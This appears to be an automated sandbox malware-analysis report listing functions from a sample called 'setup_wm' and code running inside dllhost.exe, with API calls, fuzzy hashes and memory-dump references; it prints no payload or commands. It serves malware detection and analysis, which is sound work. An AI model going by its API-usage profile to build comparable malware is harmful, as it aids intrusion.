Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e26a3d902f64fdb1e6a29b1ddfd8af137ced715061d327bbcfc87f3b72d7e64f
Instruction ID: bd81533e4a947f7abd2d95fabd2e5a9e12631127e0249ee9afcd739f7db5602b
Opcode Fuzzy Hash: e26a3d902f64fdb1e6a29b1ddfd8af137ced715061d327bbcfc87f3b72d7e64f
Instruction Fuzzy Hash: CA71C235648B088FE779EB18DC89AA573E1FBB4710F20162DD68BD7192DB20F94687C1

Function 0000021CE78E6C10 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE ref: 0000021CE78E6CD6

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c27442c9625b69612e30a0c621dafdc38b3cd1b2ea33eefe8ec2cdf5f7c33623
Instruction ID: 547d24df049a81450443404895e61895d36f83690085a45db7fafa63f1d3e439
Opcode Fuzzy Hash: c27442c9625b69612e30a0c621dafdc38b3cd1b2ea33eefe8ec2cdf5f7c33623
Instruction Fuzzy Hash: A041C738354B084BEB79F7389C997EA32D2E7B4310F600639A946EB1C6DF25D94187C1

Function 0000021CE78E778C Relevance: 1.6, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE ref: 0000021CE78E78B2

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: c6fe4b8a49b1c432d16a5d1b2244a4336856686fe2f0bc0d983b446ba2d85ae3
Instruction ID: a9b8cd20af64975e3d7b022b848cedf85ee26bd39a80bd225909a63b0cb5a79d
Opcode Fuzzy Hash: c6fe4b8a49b1c432d16a5d1b2244a4336856686fe2f0bc0d983b446ba2d85ae3
Instruction Fuzzy Hash: 3A4160751187488BE769EF24C899BDBB3E1FBB4300F104A2EE18AD7191EF759505CB82

Function 0000021CE78ECCD0 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 0000021CE78ECD2F

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 2f464fde3477c0bba4832f44d3340180ae7d23497e5ed422822a87f1e6a42210
Instruction ID: bb7a84f6a70e592266d7e40f17e628c9385f1452e7f2659dd62d57961426dd2f
Opcode Fuzzy Hash: 2f464fde3477c0bba4832f44d3340180ae7d23497e5ed422822a87f1e6a42210
Instruction Fuzzy Hash: AF01C471704A0C8FE750FB19D8859A9B7E9FBE8310F50062AE94AD6140EF20EA558781

Function 0000021CE78E2904 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0000021CE78E293C

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a3e65a005f3911c52a3a19618f507bf36bcbd5794d57615cb3bbd7cad2f75c67
Instruction ID: 93fbed348495416d31c0e03f304514789bd129db66128aced5e8b17b16d61125
Opcode Fuzzy Hash: a3e65a005f3911c52a3a19618f507bf36bcbd5794d57615cb3bbd7cad2f75c67
Instruction Fuzzy Hash: 04012635754E098FEB68EB6DDC98A6533D1FB9A316B144075D80AC7144DA3A9C41CB81

Function 00007DF4B9912F60 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

SetWinEventHook.USER32 ref: 00007DF4B9912FCD

Memory Dump Source

Source File: 00000008.00000002.2585736667.00007DF4B9911000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9911000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7df4b9911000_setup_wm.jbxd

Similarity

API ID: EventHook
String ID:
API String ID: 3661607649-0
Opcode ID: e6b188324f96a1e03f166e4287a2793acb406422b2b30f8b11d607c185f61fee
Instruction ID: 526248aafb145dab66a769908235266506732315e41dfb149aa054cb388de3f5
Opcode Fuzzy Hash: e6b188324f96a1e03f166e4287a2793acb406422b2b30f8b11d607c185f61fee
Instruction Fuzzy Hash: 3D1165309189566FFB94EBA0D86A79B7AF0FF11318F500639D08BC22E2DB3DD4649741

Function 0000021CE78EBE7C Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000021CE78EBED6

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4d57d7d5982399080f90361c2699a999889f8feb933735bc5bb6e787f07df0d3
Instruction ID: 18b8b5072a10f597fa5cea66ee83e96dd70d3da6da5f5d7cc1185b2f5c3c90bb
Opcode Fuzzy Hash: 4d57d7d5982399080f90361c2699a999889f8feb933735bc5bb6e787f07df0d3
Instruction Fuzzy Hash: 6301A434318B4D4FFB55EB38986A7A936D5EB74301F60057BA10AD7292EA28CD058781

Function 0000021CE78E2B50 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 0000021CE78E2B70

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: eab2b32177be9564e25d5777707ea1ca30621b5695f0306aefe172fe800bc35c
Instruction ID: 75acab24612675fe696574515e5beb6a04c7df79fe3bbe94e767733e4483531d
Opcode Fuzzy Hash: eab2b32177be9564e25d5777707ea1ca30621b5695f0306aefe172fe800bc35c
Instruction Fuzzy Hash: CFF0A735684F088FF738AE755C983962341F3F8212F34093AD645DA181DA3588414380

Function 0000021CE78E697C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetProcAddressForCaller.KERNELBASE ref: 0000021CE78E69A3

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: AddressCallerProc
String ID:
API String ID: 2663294120-0
Opcode ID: c691d5039295ecc8b7e044fb40fc3c69618cf93c91779b6bda279d67736a12d8
Instruction ID: f3a08863edaeeaed7d6779f15378958233bb72715abaa2847892482564b829ff
Opcode Fuzzy Hash: c691d5039295ecc8b7e044fb40fc3c69618cf93c91779b6bda279d67736a12d8
Instruction Fuzzy Hash: 5AE0C221704D190BAB7861AE288CAB611C6C7FC172714027BE51CC3299EE10CC410380

Function 00007DF4B9911708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlAddFunctionTable.KERNEL32 ref: 00007DF4B9911735

Memory Dump Source

Source File: 00000008.00000002.2585736667.00007DF4B9911000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9911000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7df4b9911000_setup_wm.jbxd

Similarity

API ID: FunctionTable
String ID:
API String ID: 1252446317-0
Opcode ID: 62df2a061ef9a83e40c3da8f8fbf33d98cfabe8aaf6c816d3fbd47a45bbcd3fe
Instruction ID: 704d3d99bfc3cd373e1bcca7e68dc6f3318defd22abd6765c350f6123f1c9977
Opcode Fuzzy Hash: 62df2a061ef9a83e40c3da8f8fbf33d98cfabe8aaf6c816d3fbd47a45bbcd3fe
Instruction Fuzzy Hash: 2BE04F306509066BEBA8E61DC8497603AE0FB5830AF608269D405CA391CB3994ABCF42

Function 00007DF4B9901290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlAddFunctionTable.KERNEL32 ref: 00007DF4B99012BD

Memory Dump Source

Source File: 00000008.00000002.2585645214.00007DF4B9901000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9901000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7df4b9901000_setup_wm.jbxd

Similarity

API ID: FunctionTable
String ID:
API String ID: 1252446317-0
Opcode ID: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
Instruction ID: 60123d071eee8e860e920a54589b65e4253a81c0b0f2dad6104d49aa023580c2
Opcode Fuzzy Hash: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
Instruction Fuzzy Hash: 2DE04F309049065BEBA8D66DC8097503AE0FB5C30AF608669D509C9291CB39989BCF81

Function 00007DF4B9901290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlAddFunctionTable.KERNEL32 ref: 00007DF4B99012BD

Memory Dump Source

Source File: 00000008.00000003.1706002611.00007DF4B9901000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9901000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_7df4b9901000_setup_wm.jbxd

Similarity

API ID: FunctionTable
String ID:
API String ID: 1252446317-0
Opcode ID: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
Instruction ID: 7740fd94aef7e1f3dc5c7d8fd20d357661017d8f4b0efa411c420e08befc9559
Opcode Fuzzy Hash: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
Instruction Fuzzy Hash: 08E04F309049055BEBA8D66DC8097503AE0FB5830EF608669D509C9291CB79949BCF81

Function 0000021CE78E3C84 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlAddFunctionTable.KERNEL32 ref: 0000021CE78E3CB1

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: FunctionTable
String ID:
API String ID: 1252446317-0
Opcode ID: a4029a93bfcd341c8676454adb8c6f5f12b6913b14ed0bccef0902b234b6dd47
Instruction ID: a5541749bc9f28855cd368ac3a6138543f453b22dd469aa808e767e67a6d6a03
Opcode Fuzzy Hash: a4029a93bfcd341c8676454adb8c6f5f12b6913b14ed0bccef0902b234b6dd47
Instruction Fuzzy Hash: 1EE04F34140A055BEBA8DB1DC90D39036D0EBB831AF604268D504C9695CB3AC8DBCF81

Function 0000021CE78E6950 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000021CE78E6972

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction ID: d492206c2a91b8dafaff30d80c8113f71ae012fc165048167e9400ad4e6ce8cc
Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction Fuzzy Hash: 45D0A720360E0D1BEA58633D1C9937551D5E7FC221F60027AB90AC2286DA58CC560380

Function 0000021CE78EC784 Relevance: 1.5, APIs: 1, Instructions: 272COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0000021CE78EC9BF

Part of subcall function 0000021CE78EA9C0: malloc.MSVCRT(?,?,?,?,?,?,?,?,?,0000021CE78F0BFB), ref: 0000021CE78EA9DF

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 59198f789e8770a8feb484424aff911a50a4b1632d60f2ad6db9f6e5577744bf
Instruction ID: d1c30e56214173caaebb7740d700404e5c0043a5d82261ee573c1dfdccd4f245
Opcode Fuzzy Hash: 59198f789e8770a8feb484424aff911a50a4b1632d60f2ad6db9f6e5577744bf
Instruction Fuzzy Hash: 1D915275558B484BD775FF14C89A6EAB3E1FBB8300F50093EE28AD7191EB30A54587C2

Function 0000021CE78EA76C Relevance: 1.4, APIs: 1, Instructions: 139COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0000021CE78EA7FB

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d2cb0783aaccdf533b8783a245833ea662784d452517a49626c29c14fb2d72e4
Instruction ID: 789cbecd4813fe80b4da85199bf39e807f2ed3aacbb53f902303b748960e72bb
Opcode Fuzzy Hash: d2cb0783aaccdf533b8783a245833ea662784d452517a49626c29c14fb2d72e4
Instruction Fuzzy Hash: B0414B35218E0E8FDB94EF2CD88CAB5B7E1FB78711724466AD409C7664DB30E8858BC1

Function 0000021CE78EA9C0 Relevance: 1.3, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

malloc.MSVCRT(?,?,?,?,?,?,?,?,?,0000021CE78F0BFB), ref: 0000021CE78EA9DF

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 79f048227ef8738a33d949dde2ae729533ca550820ee63163f1e85203fe644fa
Instruction ID: ad138a98fa7f2c0724376ee1bf17cd8322003e61028c4aa683d9feb9be146154
Opcode Fuzzy Hash: 79f048227ef8738a33d949dde2ae729533ca550820ee63163f1e85203fe644fa
Instruction Fuzzy Hash: F521AE31214E0C8FDB59EF1CD88C7A173E5FBB831271442ABD809CB2A5DA24E9858B81

Function 0000021CE78FD4AC Relevance: 1.3, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0000021CE78FD4FE

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e53db298d0d7d8de9701e8a24c72cb59212fc55ca396913229799ff2ccd7724d
Instruction ID: 6ddfe6c141a6c1f415c2b6939f657539f23cbd44ec59bfc7cb105a9972e3d96b
Opcode Fuzzy Hash: e53db298d0d7d8de9701e8a24c72cb59212fc55ca396913229799ff2ccd7724d
Instruction Fuzzy Hash: 4B114435240A1D8FEF79AF6998A93A533D0FB78315F2401BADA19DA195CB708C41C7E1

Function 0000021CE7924468 Relevance: 1.3, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0000021CE7924496

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
Instruction ID: d138a85eefd45e2bd5a34f8d3b4fac49cad1d07abeffe2b45c211078a50a924f
Opcode Fuzzy Hash: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
Instruction Fuzzy Hash: DFF03074218E4A8FEF94EB6D94D8F6133E1FF68320F601264991AC71A5EB25DC82C780

Function 0000021CE78E4998 Relevance: 1.3, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 0000021CE78E49CB

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: calloc
String ID:
API String ID: 2635317215-0
Opcode ID: f09fa07cc6f9e6f5b53de74bb20c91754370ab02738bba199ca246931610d18a
Instruction ID: e0b94ebae03dfa7fc616b4404b45875b1258271ad5a92df10d4067b31b135671
Opcode Fuzzy Hash: f09fa07cc6f9e6f5b53de74bb20c91754370ab02738bba199ca246931610d18a
Instruction Fuzzy Hash: 28F08974650D094FF794AF2C9C9CB6535D4E769301F550076A50DD71A0DF78CC958741

Non-executed Functions

Function 00007DF4B990199C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 00007DF4B9901AB6

Strings

., xrefs: 00007DF4B9901A32
o, xrefs: 00007DF4B9901A38
(, xrefs: 00007DF4B9901A2C

Memory Dump Source

Source File: 00000008.00000002.2585645214.00007DF4B9901000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9901000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7df4b9901000_setup_wm.jbxd

Similarity

API ID: InformationProcessQuery
String ID: ($.$o
API String ID: 1778838933-116743476
Opcode ID: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
Instruction ID: 74c53aa55963c857ba1533d99760be30ca634ef989d41c9968609b7fd2cf0a06
Opcode Fuzzy Hash: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
Instruction Fuzzy Hash: 2C818F3090C7D59EE3B59BB8C4183EBBBE1FF95304F145A2ED0EBC3292D62895458712

Analysis Process: dllhost.exePID: 7468, Parent PID: 5452COMMON

Executed Functions

Function 0000022FAA4B385C Relevance: 1.8, APIs: 1, Instructions: 269
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000022FAA4B3484: GetVolumeInformationW.KERNELBASE ref: 0000022FAA4B35BB

NtQuerySystemInformation.NTDLL ref: 0000022FAA4B39CF

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: Information$QuerySystemVolume
String ID:
API String ID: 2187445334-0
Opcode ID: bbe3e2a7d344cf85ec3a4c395e4fae651ef179c001aa808880b53e11515cf003
Instruction ID: 82e77dc104a69b28a81b8867702c85aadf0abc9af876767e0e6e88286637e210
Opcode Fuzzy Hash: bbe3e2a7d344cf85ec3a4c395e4fae651ef179c001aa808880b53e11515cf003
Instruction Fuzzy Hash: 5F918231214F095FEBA5EB74C9596E673F1FB68301F104A3AA85FC32A1EE3895498781

Function 0000022FAA4B2AC4 Relevance: .3, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f2ab5fabc2a0e36146663c7120b09b4177702f3456a2b2b11960e1abc9f1dee
Instruction ID: 6a52c8f50f646be1d18ab75eed1ff0d62b651f8fe42b9d89e29de725d065ee50
Opcode Fuzzy Hash: 0f2ab5fabc2a0e36146663c7120b09b4177702f3456a2b2b11960e1abc9f1dee
Instruction Fuzzy Hash: E5B15531218B095BE796EB58C695ADB73F1FB94304F104639BC8FC71A6DE28E509CB81

Function 0000022FAA4D6E1C Relevance: 6.1, APIs: 4, Instructions: 130
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0000022FAA4D6E25
socket.WS2_32 ref: 0000022FAA4DA42B
getsockopt.WS2_32 ref: 0000022FAA4DA45F
socket.WS2_32 ref: 0000022FAA4DA494

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: socket$ErrorModegetsockopt
String ID:
API String ID: 552242919-0
Opcode ID: 2b6fb284fe353a32addd25f3df84090d0ecaa741c51bc7f7119ce81397f063fd
Instruction ID: 1a18e1604d16b3193d73719260d10bae455a0b393811a2d03b56fc93ca4103e3
Opcode Fuzzy Hash: 2b6fb284fe353a32addd25f3df84090d0ecaa741c51bc7f7119ce81397f063fd
Instruction Fuzzy Hash: 54412130618B488FE794EF68D89869A77F1FB98300F50873AE45AC32E5DF398509CB41

Function 0000022FAA4B3658 Relevance: 3.2, APIs: 2, Instructions: 176
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE ref: 0000022FAA4B3792
MapViewOfFile.KERNELBASE ref: 0000022FAA4B37B9

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: File$CreateMappingView
String ID:
API String ID: 3452162329-0
Opcode ID: bece0600f44f861c643c7654aa2f2e3f03c84c914f92a664447b07396d3fe0fc
Instruction ID: 153b05d9e7fe8d1ca7bc24365509ccf590fad85d5159d510860e81628f2a2ecf
Opcode Fuzzy Hash: bece0600f44f861c643c7654aa2f2e3f03c84c914f92a664447b07396d3fe0fc
Instruction Fuzzy Hash: F951703151CB889BD765EB65C5857EAB7F0FB94301F004A3FB89AC21A1DA349509CB92

Function 0000022FAA4D79E0 Relevance: 3.1, APIs: 2, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIoCompletionPort.KERNELBASE ref: 0000022FAA4D7A42
SetFileCompletionNotificationModes.KERNEL32 ref: 0000022FAA4D7A88

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: Completion$CreateFileModesNotificationPort
String ID:
API String ID: 3755109111-0
Opcode ID: 84be1d14cb65808509a283a73e814be659c70036e97280a94885828e4d56e97e
Instruction ID: bdfed706cbcbbbf15498ef239edb249a0379437b201d4bdbc91ee36b2619108e
Opcode Fuzzy Hash: 84be1d14cb65808509a283a73e814be659c70036e97280a94885828e4d56e97e
Instruction Fuzzy Hash: BD31C0303046195FFBE89BA89A8D36932F4F744315F900079FC2ECA2E2DB69CD458781

Function 0000022FAA4B3484 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE ref: 0000022FAA4B35BB

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: cbef5665e4e33130d77fabd6912371dd21022a2eb90503feaf05fbace3e60585
Instruction ID: e7a69a64f5d309b6c29bf94f4179094ed097116b7e63c5b28e7c579fbfe03aff
Opcode Fuzzy Hash: cbef5665e4e33130d77fabd6912371dd21022a2eb90503feaf05fbace3e60585
Instruction Fuzzy Hash: 305101711187488BE7AAEB64C5987EBB7F0FB94304F504A3DE48AC21A1DF799509CB42

Function 0000022FAA4D7DD0 Relevance: 1.6, APIs: 1, Instructions: 93
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0000022FAA4D7DFD

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: 164deb1e36558be1443e0572fd883e2d2b2af36008d1889a4b6708111c61d883
Instruction ID: 54952a3fc07bc58e9b69d54b5f7777ca2e7d9f2c73ef17cf973e801f4e136c4c
Opcode Fuzzy Hash: 164deb1e36558be1443e0572fd883e2d2b2af36008d1889a4b6708111c61d883
Instruction Fuzzy Hash: 592192303046045FEBD8ABB8998D76533F1EB58325F204679FC3EC72E6EB288C458691

Function 0000022FAA4B28D4 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0000022FAA4B2949

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 147b7861b8d55a5ae4162ffc4259640c3a28b81395385b0f304c643425426fcc
Instruction ID: 555513282ad920f66b321a784454b5d8a620c5a7a18bc07358629b2bd1f74456
Opcode Fuzzy Hash: 147b7861b8d55a5ae4162ffc4259640c3a28b81395385b0f304c643425426fcc
Instruction Fuzzy Hash: 10011E20314B092AEBD9B6A8CB593B922F6EB95310F440139BC0ED21E2DE1CDA098641

Function 0000022FAA4B28A0 Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddressForCaller.KERNELBASE ref: 0000022FAA4B28C7

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: AddressCallerProc
String ID:
API String ID: 2663294120-0
Opcode ID: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
Instruction ID: 572301d06be12458d479bb85f6c8b2b9010ca51005ae3d1ed1e36297d74c8ad8
Opcode Fuzzy Hash: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
Instruction Fuzzy Hash: 2EE02B11704D0D1BABE861FE658C77651E6C7DC272B04027BFC1DC32A5ED14CC890390

Function 0000022FAA4B2874 Relevance: 1.5, APIs: 1, Instructions: 24
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000022FAA4B2896

Memory Dump Source

Source File: 00000009.00000002.2584494739.0000022FAA4B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022FAA4B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_22faa4b0000_dllhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction ID: 1998da428ac4c3fea1a03041c6f35ed7993c3b39afe8a3965d80fa8b6333250b
Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction Fuzzy Hash: 8AD0A710320E0E2FEB88637D5E9837511E5E7EC225F50153ABC0DC2281D95CCC594300

